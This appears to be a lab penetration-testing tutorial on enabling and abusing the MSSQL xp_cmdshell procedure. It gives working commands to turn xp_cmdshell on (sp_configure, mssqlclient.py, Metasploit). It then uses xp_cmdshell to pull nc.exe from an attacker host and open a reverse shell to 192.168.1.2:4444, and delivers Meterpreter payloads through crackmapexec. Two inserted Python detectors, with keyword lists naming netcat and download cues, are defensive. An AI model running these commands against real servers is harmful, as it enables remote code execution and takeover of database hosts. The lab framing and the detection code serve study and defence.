
x32x01

Today’s article is the third in our series on MSSQL Server penetration testing. In this article, we will be examining and exploiting the security aspects of the xp_cmdshell functionality.

Table of Content
  • Introduction
    • What is xp_cmdshell?
  • Enabling xp_cmdshell
    • Manually (GUI)
    • sqsh
    • mssqlclient.py
    • Metasploit
  • Exploiting xp_cmdshell:
    • Metasploit
    • Netcat
    • Crackmapexec
    • Nmap
    • PowerUpSQL
  • Conclusion
Introduction
All the demonstrations in this article are presented on an MSSQL Server. To get the MS-SQL server set up, you can refer to our article: Penetration Testing Lab Setup: MS-SQL. Previously, we briefly discussed exploiting the xp_cmdshell functionality with the Metasploit module exploit/windows/mssql/mssql_payload in our article: MSSQL Penetration Testing with Metasploit. However, in that article we didn’t explain the background of the xp_cmdshell functionality or its security aspects, which we will discuss here.

What is xp_cmdshell?
According to the official Microsoft documentation, xp_cmdshell is an extended stored procedure that spawns a Windows command shell and passes in a string for execution. Any output it generates is returned as rows of text. To simplify, we can say that it allows database administrators to launch any external process directly from the SQL Server. The implementation of xp_cmdshell can be traced back to SQL Server 6.5. It was designed to combine SQL queries with system commands to automate tasks that would otherwise require additional programming. Now that we have some knowledge about xp_cmdshell, we can see how it can be enabled on an SQL server.

Enabling xp_cmdshell
Manually (GUI)

By default, xp_cmdshell is disabled in the SQL server. We need administrator (sysadmin) privileges to enable it. In the demonstration below, we are using the credentials of the SA user to log in to the SQL server.

1.png

Now that we have the SQL instance running as Administrator, we need to access the Object Explorer section. Here, we have the SQL Server Instance; we right-click on the instance to find a drop-down menu. We need to choose the “Facets” option from this menu, as demonstrated below:

2.png

Clicking on the Facets option will open a new window. It will have a field with the various types of facets available. We need to choose the Surface Area Configuration facets from the drop-down menu, as shown in the image below:

3.png

After choosing the surface area configuration facet, we see that we have the XPCmdShellEnabled option set as false.

4.png

Clicking on the XP command shell option, we change its value from false to true, as shown in the figure below. This way, we can enable XP command shell using the graphical user interface on a Windows MSSQL Server.

5.png

sqsh
Next, we use the sqsh tool on the Kali machine to check whether the xp_cmdshell option is enabled on the target machine. The syntax for this tool is quite simple: type sqsh with -S and the target IP address, followed by -U with the username of the server admin and -P with the password for that user, as shown in the image below.
Code:
sqsh -S 192.168.1.146 -U sa -P "Password@1"
xp_cmdshell 'whoami';
go

10.png

As we can observe from the image, the SQL Server blocked access to the procedure xp_cmdshell; therefore, we will enable it now. To enable xp_cmdshell on the target machine using sqsh, we run a series of commands that first expose the advanced options through sp_configure, then set the xp_cmdshell option to 1, and finally run RECONFIGURE so that the new value takes effect, as shown in the image below.
Code:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
go
xp_cmdshell 'whoami';
go

11.png

The activity can be verified by checking similarly to what we did with the GUI option as before.
12.png
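Every sp_configure change made above is written to the SQL Server ERRORLOG as a "Configuration option '...' changed from X to Y" line, which gives defenders a cheap way to spot xp_cmdshell being switched on without any agent on the host. The following Python script is an added example, not code from the original article: it parses ERRORLOG-style lines (the sample log is constructed, following the real message format) and flags the 'show advanced options' -> 'xp_cmdshell' sequence per spid, which is exactly what the sqsh, mssqlclient.py and Metasploit steps produce.

```python
"""Flag xp_cmdshell being enabled from SQL Server ERRORLOG lines.

Added example, not part of the original article. The log lines below are
constructed; their shape follows the ERRORLOG message SQL Server writes when
sp_configure/RECONFIGURE change a setting.
"""
import re
from datetime import datetime, timedelta

# "<timestamp> spid<N>  Configuration option '<name>' changed from <old> to <new>. Run the RECONFIGURE statement to install."
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Constructed sample log: one session (spid55) enables xp_cmdshell the way the
# sqsh section does, then hides the advanced options again; spid60 later
# disables xp_cmdshell; spid62 changes an unrelated setting.
SAMPLE_LOG = """\
2021-03-10 11:02:13.51 spid51       Starting up database 'tempdb'.
2021-03-10 11:05:40.12 spid55       Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-03-10 11:05:41.03 spid55       Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-03-10 11:05:41.90 spid55       Configuration option 'show advanced options' changed from 1 to 0. Run the RECONFIGURE statement to install.
2021-03-10 13:30:02.77 spid60       Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2021-03-10 14:00:00.00 spid62       Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
"""


def parse_config_changes(text):
    """Return (timestamp, spid, option, old, new) for every configuration-change line."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        events.append((ts, m["spid"], m["option"], int(m["old"]), int(m["new"])))
    return events


def detect_xp_cmdshell_enable(text, window=timedelta(minutes=5)):
    """Report each time xp_cmdshell goes to 1.

    Severity is 'high' when the same spid turned on 'show advanced options'
    within `window` beforehand (the canonical enabling sequence), 'medium'
    otherwise. Disabling (1 -> 0) is not reported.
    """
    findings = []
    advanced_on_at = {}  # spid -> timestamp of 'show advanced options' 0 -> 1
    for ts, spid, option, old, new in parse_config_changes(text):
        if option == "show advanced options" and new == 1:
            advanced_on_at[spid] = ts
        elif option == "xp_cmdshell" and new == 1:
            preceded = spid in advanced_on_at and ts - advanced_on_at[spid] <= window
            findings.append({
                "time": ts.isoformat(sep=" "),
                "spid": spid,
                "severity": "high" if preceded else "medium",
                "note": "xp_cmdshell enabled"
                        + (" right after 'show advanced options' was turned on" if preceded else ""),
            })
    return findings


if __name__ == "__main__":
    for f in detect_xp_cmdshell_enable(SAMPLE_LOG):
        print(f"{f['time']} {f['spid']} [{f['severity']}] {f['note']}")
```

Because the finding carries the spid, it can be joined with the login audit for that session to answer who enabled the procedure, and a 'show advanced options' 1 -> 0 shortly afterwards (as in the sample) is worth a note of its own, since it leaves xp_cmdshell on while hiding it from sp_configure's default listing.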

mssqlclient.py
MSSQL runs as a set of Windows services, each with its own service account. Whenever an instance of SQL Server is installed, a set of Windows services with unique names is installed alongside it. SQL Server supports the following account types:
  • Windows Accounts
  • SQL Server Login
  • DB Users
To use mssqlclient.py, we need to specify the username, domain, password, target IP address, and the port hosting the MSSQL service, as shown in the image. Once connected, we can use the enable_xp_cmdshell command to enable the command shell functionality on the target machine.
Code:
python3 mssqlclient.py WORKGROUP/sa:Password@1@192.168.1.146 -port 1433
enable_xp_cmdshell

13.png

Again, we can verify it the same way we did with the GUI and sqsh approaches. Here we can see that we were able to enable xp_cmdshell with the help of mssqlclient.py, which is part of the Impacket toolkit.
14.png

Previously, mssqlclient.py was used to connect to the database with SQL Server credentials (the sa login). Now we connect to the database with a Windows user’s login credentials.
15.png

Code:
python3 mssqlclient.py ignite:'Password@123'@192.168.1.146 -windows-auth
enable_xp_cmdshell

16.png

Metasploit
As usual, Metasploit also plays its role: it enables xp_cmdshell, exploits the target, and provides us with a session.
Code:
use exploit/windows/mssql/mssql_payload
set rhosts 192.168.1.146
set password Password@1
exploit

20.png

The exploit does not stop at just enabling xp_cmdshell. It then runs a series of commands that get us a Meterpreter shell on the target machine, as shown in the image below.
21.png

Exploiting xp_cmdshell
Metasploit
We can use another module, auxiliary/admin/mssql/mssql_exec, which first enables xp_cmdshell and then runs whatever command we place in the cmd option. Here we set cmd to “ipconfig”.
Code:
use auxiliary/admin/mssql/mssql_exec
set rhosts 192.168.1.146
set password Password@1
set cmd "ipconfig"
exploit

22.png

Netcat
Here, we use netcat to get a reverse connection from the target machine. To do so, we first need to transfer the netcat binary to the Windows machine. For this, we will use the nc.exe executable, which is located at /usr/share/windows-binaries. Then we can use a Python one-liner to serve it over HTTP.
Code:
cd /usr/share/windows-binaries
ls -al
python -m SimpleHTTPServer 80

30.png

Here, xp_cmdshell runs powershell.exe, which uses the wget alias to download netcat into the C:\Users\Public directory, which is writable by every user. Then we use xp_cmdshell again to execute the netcat binary with cmd.exe, creating a reverse connection to the Kali machine on port 4444.
Code:
xp_cmdshell 'powershell.exe wget http://192.168.1.2/nc.exe -OutFile c:\Users\Public\nc.exe';
xp_cmdshell 'c:\Users\Public\nc.exe -e cmd.exe 192.168.1.2 4444';

31.png

In Kali Linux, we have a netcat listener on port 4444; once the PowerShell command executes, as shown in the screenshot above, we get a shell on the target machine.
Code:
nc -lvp 4444
whoami

32.png

Crackmapexec
Another method to get a reverse connection from the target machine through xp_cmdshell is to use its ability to run system commands together with the web_delivery payload. The process is quite simple: we use the exploit/multi/script/web_delivery module, set the target to the Windows (PowerShell) option, set the payload to windows/meterpreter/reverse_tcp, set lhost to our Kali machine, and finally run the exploit command.
Code:
use exploit/multi/script/web_delivery
set target 2
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit

45.png

The above module gives us the web_delivery URL, which we pass to crackmapexec’s web_delivery module.
Code:
crackmapexec mssql 192.168.1.146 -u 'ignite' -p 'Password@123' -M web_delivery -o URL=http://192.168.1.2:8080/om6cxs3B

46.png

The output of the crackmapexec shows that the target has been pwned. We can go back to the Metasploit shell and find that the target has been exploited successfully, and we have a meterpreter shell on the target machine.
47.png
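Both the Netcat and the crackmapexec web_delivery chains above have the same shape on the endpoint: xp_cmdshell hands its argument to cmd.exe, which SQL Server spawns as a child of sqlservr.exe, and that cmd.exe in turn launches powershell.exe or nc.exe. That parent/child chain is what a defender can alert on. The following Python script is an added example, not code from the original article or from any of the tools it describes: it runs a simple rule over constructed process-creation records whose field names mimic Sysmon Event ID 1 (Image, ParentImage, ProcessGuid, ParentProcessGuid, CommandLine, User); the GUIDs, install paths and the benign maintenance command are made up, while the IPs, URL and user names reuse the lab values from this article.

```python
"""Detect xp_cmdshell-driven command execution from process-creation events.

Added example, not code from the original article. The records below are
constructed and only imitate Sysmon Event ID 1 field names; GUIDs and paths
are placeholders.
"""
import ntpath

# Children that a sqlservr.exe -> cmd.exe chain should rarely launch.
SUSPICIOUS_CHILDREN = {
    "powershell.exe", "pwsh.exe", "nc.exe", "certutil.exe",
    "bitsadmin.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
}
# Command-line fragments pointing at a download or an outbound connection.
NETWORK_CUES = ("http://", "https://", "wget ", "invoke-webrequest",
                "iwr ", "downloadstring", "-e cmd.exe", "-outfile")

# Constructed paths (the install directory is an assumption).
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
NC = r"C:\Users\Public\nc.exe"
SVC = r"NT SERVICE\MSSQL$SQLEXPRESS"


def ev(guid, parent_guid, image, parent_image, cmdline, user=SVC):
    """Build one constructed process-creation record."""
    return {"ProcessGuid": guid, "ParentProcessGuid": parent_guid, "Image": image,
            "ParentImage": parent_image, "CommandLine": cmdline, "User": user}


SAMPLE_EVENTS = [
    ev("g1", "g0", SQLSERVR, r"C:\Windows\System32\services.exe", '"sqlservr.exe" -sSQLEXPRESS'),
    # Benign: a maintenance job listing a backup folder through xp_cmdshell.
    ev("g2", "g1", CMD, SQLSERVR, r"cmd.exe /c dir C:\Backups"),
    # Netcat section: stage the binary with PowerShell ...
    ev("g3", "g1", CMD, SQLSERVR,
       r"cmd.exe /c powershell.exe wget http://192.168.1.2/nc.exe -OutFile c:\Users\Public\nc.exe"),
    ev("g4", "g3", PS, CMD, r"powershell.exe wget http://192.168.1.2/nc.exe -OutFile c:\Users\Public\nc.exe"),
    # ... then run it to open the reverse connection.
    ev("g5", "g1", CMD, SQLSERVR, r"cmd.exe /c c:\Users\Public\nc.exe -e cmd.exe 192.168.1.2 4444"),
    ev("g6", "g5", NC, CMD, r"c:\Users\Public\nc.exe -e cmd.exe 192.168.1.2 4444"),
    # Unrelated: an interactive user opening PowerShell from Explorer.
    ev("g7", "g9", PS, r"C:\Windows\explorer.exe", "powershell.exe", user=r"WIN-P83OS778EQK\ignite"),
]


def basename(path):
    """Lower-cased file name of a Windows path, regardless of the host OS."""
    return ntpath.basename(path).lower()


def find_xp_cmdshell_chains(events):
    """Return one finding per cmd.exe spawned by sqlservr.exe (xp_cmdshell's
    signature), rated 'high' when it launched a suspicious child or its
    command line carries a download/connect-back cue, 'low' otherwise."""
    children = {}
    for e in events:
        children.setdefault(e["ParentProcessGuid"], []).append(e)

    findings = []
    for e in events:
        if basename(e["Image"]) != "cmd.exe" or basename(e["ParentImage"]) != "sqlservr.exe":
            continue
        reasons = []
        spawned = sorted({basename(c["Image"]) for c in children.get(e["ProcessGuid"], [])}
                         & SUSPICIOUS_CHILDREN)
        if spawned:
            reasons.append("spawned " + ", ".join(spawned))
        cmdline = e["CommandLine"].lower()
        cues = [c for c in NETWORK_CUES if c in cmdline]
        if cues:
            reasons.append("command line contains " + ", ".join(repr(c) for c in cues))
        findings.append({
            "guid": e["ProcessGuid"], "user": e["User"],
            "severity": "high" if reasons else "low",
            "reasons": reasons, "command": e["CommandLine"],
        })
    return findings


if __name__ == "__main__":
    for f in find_xp_cmdshell_chains(SAMPLE_EVENTS):
        print(f["severity"].upper(), f["guid"], f["command"], "; ".join(f["reasons"]))
```

The 'low' finding for the benign dir command is deliberate: every cmd.exe under sqlservr.exe is worth a baseline record, because a server where xp_cmdshell never legitimately runs should produce none at all, and the 'high' ratings rely only on the child process and command line, so they fire for the Nmap and PowerUpSQL variants too whenever the command they run reaches out to the network.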

Nmap
As we know, xp_cmdshell is disabled by default, but if we have sysadmin credentials, we can also use the Nmap script ms-sql-xp-cmdshell to execute Windows commands.
Code:
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=Password@1,ms-sql-xp-cmdshell.cmd='net user' 192.168.1.146

48.png

PowerUpSQL
First, download PowerUpSQL from here. PowerUpSQL is a tool for Windows machines that includes functions supporting SQL Server discovery, weak-configuration auditing, privilege escalation at scale, and post-exploitation actions such as OS command execution.

We can use the Import-Module cmdlet to import the PowerShell script. Then we use the Invoke-SQLOSCmd function, which runs OS commands via xp_cmdshell as the SQL service account.

Here, PowerUpSQL tries to connect to the database. After the connection succeeds, it checks whether the credentials we provided belong to a sysadmin. It then enables the advanced options and tries to enable xp_cmdshell. In this demonstration, xp_cmdshell is already enabled, so the tool goes on to run the whoami command, which shows that the command runs as the NT SERVICE\MSSQL$SQLEXPRESS service account.
Code:
cd PowerUpSQL-master
powershell -ep bypass
Import-Module .\PowerUpSQL.ps1
Invoke-SQLOSCmd -Username sa -Password Password@1 -Instance WIN-P83OS778EQK\SQLEXPRESS -Command whoami -Verbose

50.png

Conclusion
This article was designed to provide users with content that can help them whenever they want to perform penetration testing on MSSQL Servers by exploiting the xp_cmdshell functionality. The point of this article is not to speculate on how the user obtains the credentials or elevates to sysadmin access. Instead, once the user has those privileges, they can move on to execute multiple commands on the target system and do more damage.